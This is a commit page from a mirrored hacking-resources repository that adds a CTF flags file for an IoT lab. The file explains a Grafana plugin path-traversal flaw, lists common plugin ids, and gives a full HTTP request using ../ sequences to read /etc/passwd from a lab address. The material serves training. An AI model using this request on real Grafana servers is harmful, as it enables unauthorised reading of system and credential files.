Awesome-Mirrors/cyber-security-resources
1
0
Fork 0
mirror of https://github.com/The-Art-of-Hacking/h4cker.git synced 2024-12-18 04:04:34 -05:00
Code Issues Packages Projects Releases Wiki Activity

Create flags.md

Browse Source
This commit is contained in:
Omar Santos 2023-05-25 15:15:13 -04:00 committed by GitHub
parent 08432c2bc2
commit 161b45d275
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
iot_hacking/flags.md Normal file
View File

@ -0,0 +1,36 @@
# IoT Hacking CLUS CTF Flags
The following are the CTF flags for the grafana vulnerability in the IoT device:
The vulnerability is caused by plugin module, which is able to serve the static file inside the plugin folder. But for lock of check, attacker can use ../ to step up from the plugin folder to parent foler and download arbitrary files.
To exploit the vulnerabilty, you should know a valid plugin id, such as alertlist, here are some of common plugin ids:
```
alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text
```
Send following request to retrieve the **/etc/passwd ** (you can replace the alertlist with any valid plugin id):
```
GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: http://192.168.3.126:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
```